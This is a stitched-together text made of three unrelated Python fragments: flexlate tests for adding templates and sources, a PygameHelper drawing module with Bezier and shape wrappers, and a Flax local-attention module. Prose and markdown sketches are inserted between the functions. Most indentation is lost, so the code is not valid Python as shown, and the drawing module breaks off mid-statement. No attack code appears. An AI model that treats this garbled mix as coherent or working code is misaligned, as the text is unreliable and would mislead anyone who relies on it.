assert source.render_relative_root_in_output == Path("{{ cookiecutter.name }}")
assert source.render_relative_root_in_template == Path("{{ cookiecutter.name }}")
def _assert_remote_cookiecutter_applied_correctly(
template: Template,
template_root: Path,
add_mode: AddMode,
config_dir: Path = GENERATED_REPO_DIR,
):
config_path = config_dir / "flexlate.json"
config = FlexlateConfig.load(config_path)
assert len(config.applied_templates) == 1
at = config.applied_templates[0]
assert at.name == template.name
assert at.version == template.version
assert at.data == {"name": "abc", "key": "value"}
assert at.root == template_root
assert at.add_mode == add_mode
def test_add_source_and_output_at_target_version(
repo_with_placeholder_committed: Repo,
cookiecutter_remote_version_one_template: CookiecutterTemplate,
add_output_transaction: FlexlateTransaction,
add_source_transaction: FlexlateTransaction,
):
repo = repo_with_placeholder_committed
template = cookiecutter_remote_version_one_template
adder = Adder()
adder.add_template_source(
repo,
template,
add_source_transaction,
out_root=GENERATED_REPO_DIR,
target_version=COOKIECUTTER_REMOTE_VERSION_1,
)
adder.apply_template_and_add(
repo,
template,
add_output_transaction,
out_root=GENERATED_REPO_DIR,
no_input=True,
add_mode=AddMode.PROJECT,
)
# Check for version 1 content
output_path = GENERATED_REPO_DIR / "abc" / "abc.txt"
assert output_path.read_text() == "value"
# Check for version 1 in configs
config_path = GENERATED_REPO_DIR / "flexlate.json"
config = FlexlateConfig.load(config_path)
assert len(config.template_sources) == 1
ts = config.template_sources[0]
assert ts.version == COOKIECUTTER_REMOTE_VERSION_1
assert ts.target_version == COOKIECUTTER_REMOTE_VERSION_1
assert len(config.applied_templates) == 1
at = config.applied_templates[0]
assert at.version == COOKIECUTTER_REMOTE_VERSION_1
@patch.object(appdirs, "user_config_dir", lambda name: GENERATED_FILES_DIR)
def test_add_applied_template_to_subdir(
add_mode: AddMode,
subdir_style: SubdirStyle,
repo_with_cookiecutter_one_template_source: Repo,
cookiecutter_one_template: CookiecutterTemplate,
add_output_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_one_template_source
template = cookiecutter_one_template
subdir = GENERATED_REPO_DIR / "subdir1" / "subdir2"
subdir.mkdir(parents=True)
adder = Adder()
if subdir_style == SubdirStyle.CD:
with change_directory_to(subdir):
adder.apply_template_and_add(
repo, template, add_output_transaction, add_mode=add_mode, no_input=True
)
elif subdir_style == SubdirStyle.PROVIDE_RELATIVE:
with change_directory_to(GENERATED_REPO_DIR):
adder.apply_template_and_add(
repo,
template,
add_output_transaction,
out_root=subdir.relative_to(os.getcwd()),
add_mode=add_mode,
no_input=True,
)
elif subdir_style == SubdirStyle.PROVIDE_ABSOLUTE:
adder.apply_template_and_add(
repo,
template,
add_output_transaction,
out_root=subdir.absolute(),
add_mode=add_mode,
no_input=True,
)
if add_mode == AddMode.LOCAL:
config_dir = subdir / "b"
template_root = Path("..")
elif add_mode == AddMode.PROJECT:
config_dir = GENERATED_REPO_DIR
template_root = subdir.relative_to(GENERATED_REPO_DIR)
elif add_mode == AddMode.USER:
config_dir = GENERATED_FILES_DIR
template_root = subdir.absolute()
else:
raise ValueError(f"unsupported add mode {add_mode}")
config_path = config_dir / "flexlate.json"
config = FlexlateConfig.load(config_path)
assert len(config.applied_templates) == 1
at = config.applied_templates[0]
assert at.name == template.name
assert at.version == template.version
assert at.data == {"a": "b", "c": ""}
assert at.root == template_root
assert at.add_mode == add_mode
output_file_path = subdir / "b" / "text.txt"
assert output_file_path.read_text() == "b"
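The LOCAL/PROJECT/USER branches above pin down where the flexlate config file is written and how the applied-template root is recorded for each `AddMode`. A minimal standalone sketch of that mapping (the enum values and the `config_location` helper are illustrative, not flexlate's actual API; LOCAL is simplified — the real adder nests the config inside the rendered output directory):

```python
from enum import Enum
from pathlib import Path

class AddMode(str, Enum):
    LOCAL = "local"
    PROJECT = "project"
    USER = "user"

def config_location(add_mode: AddMode, project_dir: Path, render_dir: Path, user_dir: Path):
    # LOCAL: config sits next to the rendered output; root is recorded relative to it
    if add_mode == AddMode.LOCAL:
        return render_dir, Path("..")
    # PROJECT: one config at the project root; root is recorded relative to the project
    if add_mode == AddMode.PROJECT:
        return project_dir, render_dir.relative_to(project_dir)
    # USER: config lives in the user config dir, so the root must be absolute
    if add_mode == AddMode.USER:
        return user_dir, render_dir.absolute()
    raise ValueError(f"unsupported add mode {add_mode}")
```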
@patch.object(appdirs, "user_config_dir", lambda name: GENERATED_FILES_DIR)
def test_add_multiple_applied_templates_for_one_source(
add_mode: AddMode,
repo_with_cookiecutter_one_template_source: Repo,
cookiecutter_one_template: CookiecutterTemplate,
add_output_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_one_template_source
template = cookiecutter_one_template
subdir = GENERATED_REPO_DIR / "subdir1" / "subdir2"
subdir.mkdir(parents=True)
adder = Adder()
with change_directory_to(GENERATED_REPO_DIR):
adder.apply_template_and_add(
repo, template, add_output_transaction, add_mode=add_mode, no_input=True
)
with change_directory_to(subdir):
adder.apply_template_and_add(
repo, template, add_output_transaction, add_mode=add_mode, no_input=True
)
@dataclass
class OutputOptions:
config_dir: Path
template_root: Path
render_root: Path
expect_num_applied_templates: int = 1
applied_template_index: int = 0
output_options: List[OutputOptions] = []
if add_mode == AddMode.LOCAL:
output_options.extend(
[
OutputOptions(GENERATED_REPO_DIR / "b", Path(".."), GENERATED_REPO_DIR),
OutputOptions(subdir / "b", Path(".."), subdir),
]
)
elif add_mode == AddMode.PROJECT:
output_options.extend(
[
OutputOptions(
GENERATED_REPO_DIR,
Path("."),
GENERATED_REPO_DIR,
expect_num_applied_templates=2,
),
OutputOptions(
GENERATED_REPO_DIR,
subdir.relative_to(GENERATED_REPO_DIR),
subdir,
expect_num_applied_templates=2,
applied_template_index=1,
),
]
)
elif add_mode == AddMode.USER:
output_options.extend(
[
OutputOptions(
GENERATED_FILES_DIR,
GENERATED_REPO_DIR.absolute(),
GENERATED_REPO_DIR,
expect_num_applied_templates=2,
),
OutputOptions(
GENERATED_FILES_DIR,
subdir.absolute(),
subdir,
expect_num_applied_templates=2,
applied_template_index=1,
),
]
)
else:
raise ValueError(f"unsupported add mode {add_mode}")
for output_option in output_options:
config_dir = output_option.config_dir
template_root = output_option.template_root
render_root = output_option.render_root
expect_num_applied_templates = output_option.expect_num_applied_templates
applied_template_index = output_option.applied_template_index
config_path = config_dir / "flexlate.json"
config = FlexlateConfig.load(config_path)
assert len(config.applied_templates) == expect_num_applied_templates
at = config.applied_templates[applied_template_index]
assert at.name == template.name
assert at.version == template.version
assert at.data == {"a": "b", "c": ""}
assert at.root == template_root
assert at.add_mode == add_mode
output_file_path = render_root / "b" / "text.txt"
assert output_file_path.read_text() == "b"
def test_add_source_to_project_with_existing_outputs(
repo_with_cookiecutter_one_template_source_and_output: Repo,
cookiecutter_two_template: CookiecutterTemplate,
add_source_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_one_template_source_and_output
adder = Adder()
adder.add_template_source(
repo,
cookiecutter_two_template,
add_source_transaction,
out_root=GENERATED_REPO_DIR,
target_version="some version",
)
assert cookiecutter_one_generated_text_content(gen_dir=GENERATED_REPO_DIR) == "b"
source_config_path = GENERATED_REPO_DIR / "flexlate.json"
source_config = FlexlateConfig.load(source_config_path)
assert len(source_config.applied_templates) == 0
assert len(source_config.template_sources) == 2
source = source_config.template_sources[1]
assert source.name == cookiecutter_two_template.name
assert source.path == str(cookiecutter_two_template.path)
assert source.version == cookiecutter_two_template.version
assert source.type == TemplateType.COOKIECUTTER
assert source.target_version == "some version"
assert source.render_relative_root_in_output == Path("{{ cookiecutter.a }}")
assert source.render_relative_root_in_template == Path("{{ cookiecutter.a }}")
at_config_path = GENERATED_REPO_DIR / "b" / "flexlate.json"
at_config = FlexlateConfig.load(at_config_path)
assert len(at_config.applied_templates) == 1
def test_add_source_with_merge_conflicts_and_resolution(
repo_with_cookiecutter_remote_version_one_template_source_and_output_that_will_have_merge_conflict_on_flexlate_operation,
cookiecutter_one_template: CookiecutterTemplate,
add_source_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_remote_version_one_template_source_and_output_that_will_have_merge_conflict_on_flexlate_operation
adder = Adder()
def _resolve_conflicts_then_type_yes(prompt: str) -> bool:
assert repo_has_merge_conflicts(repo)
accept_theirs_in_merge_conflict(repo)
stage_and_commit_all(repo, "Manually resolve conflicts")
return True
with patch.object(branch_update, "confirm_user", _resolve_conflicts_then_type_yes):
adder.add_template_source(
repo,
cookiecutter_one_template,
add_source_transaction,
out_root=GENERATED_REPO_DIR,
target_version="some version",
)
assert_template_source_cookiecutter_one_added_correctly(
cookiecutter_one_template,
num_sources=2,
source_idx=1,
num_applied_templates=1,
target_version="some version",
)
def test_add_source_with_merge_conflicts_and_reject(
repo_with_cookiecutter_remote_version_one_template_source_and_output_that_will_have_merge_conflict_on_flexlate_operation,
cookiecutter_one_template: CookiecutterTemplate,
add_source_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_remote_version_one_template_source_and_output_that_will_have_merge_conflict_on_flexlate_operation
adder = Adder()
def _reject(prompt: str) -> bool:
return False
with patch.object(branch_update, "confirm_user", _reject):
adder.add_template_source(
repo,
cookiecutter_one_template,
add_source_transaction,
out_root=GENERATED_REPO_DIR,
target_version="some version",
)
config_path = GENERATED_REPO_DIR / "flexlate.json"
config = FlexlateConfig.load(config_path)
assert len(config.template_sources) == 1
assert_main_commit_message_matches(
repo.commit().message, "Reformat flexlate config"
)
for branch_name in [DEFAULT_MERGED_BRANCH_NAME, DEFAULT_TEMPLATE_BRANCH_NAME]:
branch = repo.branches[branch_name] # type: ignore
branch.checkout()
assert_main_commit_message_matches(
repo.commit().message, "Update flexlate templates"
)
def test_add_output_with_merge_conflicts_and_resolution(
repo_with_cookiecutter_remote_version_one_template_source_and_output_that_will_have_merge_conflict_on_flexlate_operation: Repo,
cookiecutter_remote_template: CookiecutterTemplate,
add_output_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_remote_version_one_template_source_and_output_that_will_have_merge_conflict_on_flexlate_operation
template = cookiecutter_remote_template
adder = Adder()
def _resolve_conflicts_then_type_yes(prompt: str) -> bool:
assert repo_has_merge_conflicts(repo)
accept_theirs_in_merge_conflict(repo)
stage_and_commit_all(repo, "Manually resolve conflicts")
return True
subdir = GENERATED_REPO_DIR / "subdir"
subdir.mkdir()
with patch.object(branch_update, "confirm_user", _resolve_conflicts_then_type_yes):
with change_directory_to(subdir):
adder.apply_template_and_add(
repo,
template,
add_output_transaction,
no_input=True,
)
_assert_remote_cookiecutter_applied_correctly(
template, Path(".."), AddMode.LOCAL, config_dir=subdir / "abc"
)
def test_add_project_config_with_git(repo_with_placeholder_committed: Repo):
repo = repo_with_placeholder_committed
adder = Adder()
adder.init_project_and_add_to_branches(repo)
for branch_name in [
"master",
DEFAULT_MERGED_BRANCH_NAME,
DEFAULT_TEMPLATE_BRANCH_NAME,
]:
branch: Head = repo.branches[branch_name] # type: ignore
branch.checkout()
config = FlexlateProjectConfig.load(
GENERATED_REPO_DIR / "flexlate-project.json"
)
assert len(config.projects) == 1
project = config.projects[0]
assert project.path == Path(".")
assert project.default_add_mode == AddMode.LOCAL
assert project.merged_branch_name == DEFAULT_MERGED_BRANCH_NAME
assert project.template_branch_name == DEFAULT_TEMPLATE_BRANCH_NAME
assert project.remote
# MIT License
#
# Copyright (c) 2021 Emc2356
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
some drawing functions
"""
from typing import List, Union, Tuple, Sequence, Optional
from PygameHelper.utils.formulas import *
from PygameHelper.exceptions import *
from PygameHelper.constants import *
from PygameHelper.types import *
from functools import lru_cache
import pygame
from math import sin, cos, sqrt
# some of these functions are in classes for better organisation
_MISSING = object()
def lerp(start: Number, stop: Number, amount: Number) -> float:
"""
Calculates a number between two numbers at a specific increment
:param start: Number
:param stop: Number
:param amount: Number
:return: float
"""
if amount > 1:
    raise ValueError("amount in lerp function is bigger than 1")
if amount < 0:
    raise ValueError("amount in lerp function is smaller than 0")
return amount * (stop - start) + start
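`lerp` is plain linear interpolation: `amount=0` returns `start`, `amount=1` returns `stop`, and values in between blend linearly. A quick self-contained restatement with endpoint and midpoint checks (restated here for illustration only):

```python
def lerp(start, stop, amount):
    # linear interpolation: amount=0 -> start, amount=1 -> stop
    if not 0 <= amount <= 1:
        raise ValueError("amount must be in [0, 1]")
    return amount * (stop - start) + start

assert lerp(0, 10, 0.5) == 5.0   # midpoint
assert lerp(2, 4, 0) == 2        # left endpoint
assert lerp(2, 4, 1) == 4        # right endpoint
```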
class _SO: # shared object
vertexes_list: List[List[Tuple[int, int]]] = []
surfaces: List[Optional[pygame.surface.Surface]] = []
loc_00: pygame.math.Vector2 = pygame.math.Vector2()
list_prev_00: List[pygame.math.Vector2] = []
class Curves:
@staticmethod
def _quadratic(p1: CoordsType, p2: CoordsType, p3: CoordsType, t: Number) -> pygame.math.Vector2:
return pygame.math.Vector2(
lerp(lerp(p1[0], p2[0], t), lerp(p2[0], p3[0], t), t),
lerp(lerp(p1[1], p2[1], t), lerp(p2[1], p3[1], t), t)
)
@classmethod
def quadratic_bezier(
cls,
surface: pygame.surface.Surface,
p1: CoordsType,
p2: CoordsType,
p3: CoordsType,
delta: Number=0.03,
color: ColorType=WHITE,
width: Number=1
) -> pygame.Rect:
"""
Quadratic bezier curve (1 static, 1 control and 1 static point)
:param surface: pygame.surface.Surface
:param p1: CoordsType
:param p2: CoordsType
:param p3: CoordsType
:param delta: Union[int, float]
:param color: ColorType
:param width: Number
:return: pygame.Rect
"""
mul_am = int(1 / delta)
return lines(
surface,
color,
False,
[cls._quadratic(p1, p2, p3, t / mul_am) for t in range(0, mul_am + 1, 1)],
width
)
@classmethod
def bezier(
cls,
surface: pygame.surface.Surface,
p1: CoordsType,
p2: CoordsType,
p3: CoordsType,
p4: CoordsType,
delta: Number=0.03,
color: ColorType=WHITE,
width: Number=1
) -> pygame.Rect:
"""
it creates a bezier curve based on 4 points (1 static, 2 control points and 1 static), aka a cubic bezier
:param surface: pygame.surface.Surface
:param p1: CoordsType
:param p2: CoordsType
:param p3: CoordsType
:param p4: CoordsType
:param delta: Union[int, float]
:param color: ColorType
:param width: Number
:return: pygame.Rect
"""
if delta >= 1:
    raise ValueError("delta in bezier function is bigger than or equal to 1")
if delta <= 0:
    raise ValueError("delta in bezier function is smaller than or equal to 0")
mul_am = int(1 / delta)
beginShape(surface)
for t in range(0, mul_am + 1, 1):
t /= mul_am
v1 = cls._quadratic(p1, p2, p3, t)
v2 = cls._quadratic(p2, p3, p4, t)
vertex(lerp(v1.x, v2.x, t), lerp(v1.y, v2.y, t))
return endShape(color=color, width=width)
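The cubic curve above is built as two quadratic evaluations blended by a final `lerp` — De Casteljau's algorithm. A pygame-free sketch of the same point evaluation (function names here are illustrative):

```python
def _lerp(a, b, t):
    # linear interpolation between scalars
    return a + t * (b - a)

def cubic_bezier_point(p1, p2, p3, p4, t):
    # evaluate the two nested quadratic control triangles
    q1 = tuple(_lerp(_lerp(p1[i], p2[i], t), _lerp(p2[i], p3[i], t), t) for i in range(2))
    q2 = tuple(_lerp(_lerp(p2[i], p3[i], t), _lerp(p3[i], p4[i], t), t) for i in range(2))
    # final blend between the two quadratic points gives the cubic point
    return tuple(_lerp(q1[i], q2[i], t) for i in range(2))

# endpoints: t=0 gives p1, t=1 gives p4
assert cubic_bezier_point((0, 0), (1, 2), (3, 2), (4, 0), 0.0) == (0.0, 0.0)
assert cubic_bezier_point((0, 0), (1, 2), (3, 2), (4, 0), 1.0) == (4.0, 0.0)
```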
class Draw:
bezier = Curves.bezier
quadratic_bezier = Curves.quadratic_bezier
@staticmethod
def push() -> None:
"""
it saves the current 0, 0 location for drawing
:return: None
"""
_SO.list_prev_00.append(_SO.loc_00.copy())
@staticmethod
def translate(
x: Union[Number, pygame.math.Vector2, Tuple[Number, Number], List[Number]],
y: Optional[Number]=_MISSING
) -> None:
"""
it sets the 0, 0 position for drawing
:param x: Union[Number, pygame.math.Vector2, Tuple[Number, Number], List[Number]]
:param y: Optional[Number]
:return: None
"""
if y is _MISSING or y is None:
if not isinstance(x, (int, float)):
x, y = x
else:
y = x
_SO.loc_00.x = x
_SO.loc_00.y = y
@staticmethod
def pop() -> None:
"""
it restores the previous 0, 0 location for drawing
:return: None
"""
if not len(_SO.list_prev_00):
raise NoLocationFound("tried to 'pop' without having 'pushed' any values")
_SO.loc_00 = pygame.math.Vector2(_SO.list_prev_00.pop())
@staticmethod
def beginShape(surface: pygame.surface.Surface) -> None:
"""
begins recording vertices for a shape
:param surface: pygame.surface.Surface
:return: None
"""
_SO.vertexes_list.append([])
_SO.surfaces.append(surface)
@staticmethod
def vertex(
x: Union[Number, pygame.math.Vector2, Tuple[Number, Number], List[Number]],
y: Optional[Number]=_MISSING
) -> None:
"""
specify the vertex coordinates for the shapes
:param x: Union[Number, pygame.math.Vector2, Tuple[Number, Number], List[Number]]
:param y: Optional[Number]
:return: None
"""
if y is _MISSING or y is None:
if not isinstance(x, (int, float)):
x, y = x
else:
y = x
_SO.vertexes_list[~0].append((int(x), int(y)))
@staticmethod
def endShape(
closed: Optional[Union[int, bool]]=None,
fill: Optional[Union[int, bool]]=None,
color: ColorType=(255, 255, 255),
width: int=1,
outline: Optional[int]=0,
outline_color: ColorType=BLACK
) -> pygame.Rect:
"""
it ends the shape and draws the shape that was constructed by the beginShape and vertex
:param closed: Optional[Union[int, bool]]=None
:param fill: Optional[Union[int, bool]]=None
:param color: ColorType=(255, 255, 255)
:param width: int=1
:param outline: Optional[int]=0
:param outline_color: Optional[ColorType]
:return: pygame.Rect
"""
if not len(_SO.surfaces):
raise ShapeError("shape was never started. start a shape with PygameHelper.beginShape")
if fill:
xx = sorted([v[0] for v in _SO.vertexes_list[~0]])
yy = sorted([v[1] for v in _SO.vertexes_list[~0]])
min_x = xx[0]
max_x = xx[~0]
min_y = yy[0]
max_y = yy[~0]
w = int(max_x - min_x)
h = int(max_y - min_y)
surf = pygame.surface.Surface((w, h))
# pick a colorkey whose red channel cannot collide with the fill color
if color[0] >= 255:
    colorkey = (0, color[1], color[2])
else:
    colorkey = (255, color[1], color[2])
surf.fill(colorkey)
surf.set_colorkey(colorkey)
pygame.draw.polygon(surf, color, [(p[0] + abs(min_x), p[1] + abs(min_y)) for p in _SO.vertexes_list[~0]])
r = _SO.surfaces[~0].blit(surf, (_SO.loc_00.x, _SO.loc_00.y))
else:
r = lines(_SO.surfaces[~0], color, closed, _SO.vertexes_list[~0], width)
if outline: lines(_SO.surfaces[~0], outline_color, closed, _SO.vertexes_list[~0], outline)
_SO.vertexes_list.pop()
_SO.surfaces.pop()
return r
@staticmethod
def rect(
surface: pygame.surface.Surface,
color: ColorType,
rect: RectType,
width: Optional[int]=0,
border_radius: Optional[int]=-1,
border_top_left_radius: Optional[int]=-1,
border_top_right_radius: Optional[int]=-1,
border_bottom_left_radius: Optional[int]=-1,
border_bottom_right_radius: Optional[int]=-1
) -> pygame.Rect:
"""
a wrapper for pygame.draw.rect but it utilises the translated value
:param surface: pygame.surface.Surface
:param color: ColorType
:param rect: RectType
:param width: Optional[int]=0
:param border_radius: Optional[int]=-1
:param border_top_left_radius: Optional[int]=-1
:param border_top_right_radius: Optional[int]=-1
:param border_bottom_left_radius: Optional[int]=-1
:param border_bottom_right_radius: Optional[int]=-1
:return: pygame.Rect
"""
rect = pygame.Rect(rect)
rect.x += _SO.loc_00.x
rect.y += _SO.loc_00.y
return pygame.draw.rect(
surface,
color,
rect,
width,
border_radius,
border_top_left_radius,
border_top_right_radius,
border_bottom_left_radius,
border_bottom_right_radius
)
@staticmethod
def polygon(
surface: pygame.surface.Surface,
color: ColorType,
points: Sequence[CoordsType],
width: Optional[int]=0
) -> pygame.Rect:
"""
a wrapper for pygame.draw.polygon but it utilises the translated value
:param surface: pygame.surface.Surface
:param color: ColorType
:param points: Sequence[CoordsType]
:param width: Optional[int]=0
:return: pygame.Rect
"""
return pygame.draw.polygon(
surface,
color,
list(map(lambda pos: (pos[0] + _SO.loc_00.x, pos[1] + _SO.loc_00.y), points)),
width
)
@staticmethod
def circle(
surface: pygame.surface.Surface,
color: ColorType,
center: CoordsType,
radius: float,
width: Optional[int] = 0,
draw_top_right: bool=False,
draw_top_left: bool=False,
draw_bottom_left: bool=False,
draw_bottom_right: bool=False
) -> pygame.Rect:
"""
a wrapper for pygame.draw.circle but it utilises the translated value
:param surface: pygame.surface.Surface
:param color: ColorType
:param center: CoordsType
:param radius: float
:param width: Optional[int] = 0
:param draw_top_right: bool=False
:param draw_top_left: bool=False
:param draw_bottom_left: bool=False
:param draw_bottom_right: bool=False
:return: pygame.Rect
"""
return pygame.draw.circle(
surface,
color,
(center[0] + _SO.loc_00.x, center[1] + _SO.loc_00.y),
radius,
width,
draw_top_right,
draw_top_left,
draw_bottom_left,
draw_bottom_right
)
@staticmethod
def ellipse(
surface: pygame.surface.Surface,
color: ColorType,
rect: RectType,
width: Optional[int] = 0
) -> pygame.Rect:
"""
a wrapper for pygame.draw.ellipse but it utilises the translated value
:param surface: pygame.surface.Surface
:param color: ColorType
:param rect: RectType
:param width: Optional[int]=0
:return: pygame.Rect
"""
rect = pygame.Rect(rect)
rect.x += _SO.loc_00.x
rect.y += _SO.loc_00.y
return pygame.draw.ellipse(
surface,
color,
rect,
width
)
@staticmethod
def arc(
surface: pygame.surface.Surface,
color: ColorType,
rect: RectType,
start_angle: float,
stop_angle: float,
width: Optional[int]=1
) -> pygame.Rect:
"""
a wrapper for pygame.draw.arc but it utilises the translated value
:param surface: pygame.surface.Surface
:param color: ColorType
:param rect: RectType
:param start_angle: float
:param stop_angle: float
:param width: Optional[int] = 1
:return: pygame.Rect
"""
rect =
# Copyright 2021 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Local Attention modules."""
from collections.abc import Iterable # pylint: disable=g-importing-member
from absl import logging
from flax import nn
from flax.nn.attention import _CacheEntry
from flax.nn.attention import _make_causal_mask
from flax.nn.attention import Cache
from flax.nn.attention import make_padding_mask
from flax.nn.stochastic import make_rng
import jax
from jax import lax
from jax import random
import jax.numpy as jnp
import numpy as onp
def local_dot_product_attention(query,
key,
value,
dtype=jnp.float32,
bias=None,
axis=None,
broadcast_dropout=True,
dropout_rng=None,
dropout_rate=0.,
deterministic=False,
precision=None):
"""Computes dot-product attention given query, key, and value.
Note: This is equivalent to the dot product attention in flax.nn.
However, we do extra broadcasting of the bias in this function.
I'm leaving this here in case we need to modify something later.
This is the core function for applying attention based on
https://arxiv.org/abs/1706.03762. It calculates the attention weights given
query and key and combines the values using the attention weights. This
function supports multi-dimensional inputs.
Args:
query: queries for calculating attention with shape of `[batch_size, dim1,
dim2, ..., dimN, num_heads, mem_channels]`.
key: keys for calculating attention with shape of `[batch_size, dim1, dim2,
..., dimN, num_heads, mem_channels]`.
value: values to be used in attention with shape of `[batch_size, dim1,
dim2,..., dimN, num_heads, value_channels]`.
dtype: the dtype of the computation (default: float32)
bias: bias for the attention weights. This can be used for incorporating
autoregressive mask, padding mask, proximity bias.
axis: axes over which the attention is applied.
broadcast_dropout: bool: use a broadcasted dropout along batch dims.
dropout_rng: JAX PRNGKey: to be used for dropout
dropout_rate: dropout rate
deterministic: bool, deterministic or not (to apply dropout)
precision: numerical precision of the computation see `jax.lax.Precision`
for details.
Returns:
Output of shape `[bs, dim1, dim2, ..., dimN, num_heads, value_channels]`.
"""
assert key.shape[:-1] == value.shape[:-1]
assert (query.shape[0:1] == key.shape[0:1] and
query.shape[-1] == key.shape[-1])
if axis is None:
axis = tuple(range(1, key.ndim - 2))
if not isinstance(axis, Iterable):
axis = (axis,)
assert key.ndim == query.ndim
assert key.ndim == value.ndim
for ax in axis:
if not (query.ndim >= 3 and 1 <= ax < query.ndim - 2):
raise ValueError('Attention axis must be between the batch '
'axis and the last-two axes.')
depth = query.shape[-1]
n = key.ndim
# batch_dims is <bs, <non-attention dims>, num_heads>
batch_dims = tuple(onp.delete(range(n), axis + (n - 1,)))
# q & k -> (bs, <non-attention dims>, num_heads, <attention dims>, channels)
qk_perm = batch_dims + axis + (n - 1,)
key = key.transpose(qk_perm)
query = query.transpose(qk_perm)
# v -> (bs, <non-attention dims>, num_heads, channels, <attention dims>)
v_perm = batch_dims + (n - 1,) + axis
value = value.transpose(v_perm)
query = query / jnp.sqrt(depth).astype(dtype)
batch_dims_t = tuple(range(len(batch_dims)))
attn_weights = lax.dot_general(
query,
key, (((n - 1,), (n - 1,)), (batch_dims_t, batch_dims_t)),
precision=precision)
# apply attention bias: masking, dropout, proximity bias, etc.
if bias is not None:
bias = bias[:, :, None, :, :]
attn_weights = attn_weights + bias
# normalize the attention weights
norm_dims = tuple(range(attn_weights.ndim - len(axis), attn_weights.ndim))
attn_weights = jax.nn.softmax(attn_weights, axis=norm_dims)
attn_weights = attn_weights.astype(dtype)
# apply dropout
if not deterministic and dropout_rate > 0.:
if dropout_rng is None:
dropout_rng = make_rng()
keep_prob = jax.lax.tie_in(attn_weights, 1.0 - dropout_rate)
if broadcast_dropout:
# dropout is broadcast across the batch+head+non-attention dimension
dropout_dims = attn_weights.shape[-(2 * len(axis)):]
dropout_shape = (tuple([1] * len(batch_dims_t)) + dropout_dims)
keep = random.bernoulli(dropout_rng, keep_prob, dropout_shape)
else:
keep = random.bernoulli(dropout_rng, keep_prob, attn_weights.shape)
multiplier = (keep.astype(attn_weights.dtype) /
jnp.asarray(keep_prob, dtype=dtype))
attn_weights = attn_weights * multiplier
# compute the new values given the attention weights
wv_contracting_dims = (norm_dims, range(value.ndim - len(axis), value.ndim))
y = lax.dot_general(
attn_weights,
value, (wv_contracting_dims, (batch_dims_t, batch_dims_t)),
precision=precision)
# back to (bs, dim1, dim2, ..., dimN, num_heads, channels)
perm_inv = _invert_perm(qk_perm)
y = y.transpose(perm_inv)
return y
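Stripped of the axis permutations and `dot_general` batching above, the core computation is scaled dot-product attention: scores `q·kᵀ/√d`, softmax over the key axis, then a weighted sum of values. A minimal NumPy sketch of that core (no multi-axis handling, bias, or dropout; `simple_attention` is an illustrative name):

```python
import numpy as np

def simple_attention(q, k, v):
    # q: [seq_q, d], k: [seq_k, d], v: [seq_k, d_v]
    d = q.shape[-1]
    scores = q @ k.T / np.sqrt(d)                  # [seq_q, seq_k]
    scores -= scores.max(axis=-1, keepdims=True)   # numerical stability
    weights = np.exp(scores)
    weights /= weights.sum(axis=-1, keepdims=True) # softmax over keys
    return weights @ v                             # [seq_q, d_v]
```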
def _invert_perm(perm):
perm_inv = [0] * len(perm)
for i, j in enumerate(perm):
perm_inv[j] = i
return tuple(perm_inv)
class LocalAttention(nn.Module):
"""Multi-head Local Attention Architecture."""
def apply(self,
inputs_q,
inputs_kv,
num_heads,
dtype=jnp.float32,
qkv_features=None,
out_features=None,
attention_axis=None,
causal_mask=False,
padding_mask=None,
key_padding_mask=None,
segmentation=None,
key_segmentation=None,
cache=None,
broadcast_dropout=True,
dropout_rng=None,
dropout_rate=0.,
deterministic=False,
precision=None,
kernel_init=nn.linear.default_kernel_init,
bias_init=nn.initializers.zeros,
bias=True,
block_size=20):
"""Applies multi-head synthesizer attention on the input data.
Projects the inputs into multi-headed query, key, and value vectors,
applies dot-product attention and project the results to an output vector.
This can be used for encoder-decoder attention by specifying both `inputs_q`
and `inputs_kv`, or for self-attention by only specifying `inputs_q` and
setting `inputs_kv` to None.
Args:
inputs_q: input queries of shape `[bs, dim1, dim2, ..., dimN, features]`.
inputs_kv: key/values of shape `[bs, dim1, dim2, ..., dimN, features]`
or None for self-attention, in which case key/values will be derived
from inputs_q.
num_heads: number of attention heads. Features (i.e. inputs_q.shape[-1])
should be divisible by the number of heads.
dtype: the dtype of the computation (default: float32)
qkv_features: dimension of the key, query, and value.
out_features: dimension of the last projection
attention_axis: axes over which the attention is applied ('None' means
attention over all axes, but batch, heads, and features).
causal_mask: boolean specifying whether to apply a causal mask on the
attention weights. If True, the output at timestep `t` will not depend
on inputs at timesteps strictly greater than `t`.
padding_mask: boolean specifying query tokens that are pad token.
key_padding_mask: boolean specifying key-value tokens that are pad token.
segmentation: segment indices for packed inputs_q data.
key_segmentation: segment indices for packed inputs_kv data.
cache: an instance of `flax.nn.attention.Cache` used for efficient
autoregressive decoding.
broadcast_dropout: bool: use a broadcasted dropout along batch dims.
dropout_rng: JAX PRNGKey: to be used for dropout
dropout_rate: dropout rate
deterministic: bool, deterministic or not (to apply dropout)
precision: numerical precision of the computation see `jax.lax.Precision`
for details.
kernel_init: initializer for the kernel of the Dense layers.
